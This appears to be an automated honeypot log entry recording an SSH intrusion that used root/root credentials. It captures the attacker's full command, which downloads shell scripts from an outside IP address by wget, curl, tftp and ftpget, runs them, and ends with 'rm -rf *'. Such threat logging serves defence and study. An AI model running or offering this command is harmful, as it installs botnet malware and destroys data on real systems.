honeypots.tk

Record Observations : 159.203.8.212 ssh Web script execution 159.203.8.212 VIJ1TH0YY66Q6PUL

159.203.8.212 client username 'root' and password 'root' entered
159.203.8.212 client command : 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.203.8.212/8UsA.sh; curl -O http://159.203.8.212/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 159.203.8.212 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 159.203.8.212; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.203.8.212 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *'
Author: Honeypots.tk Robot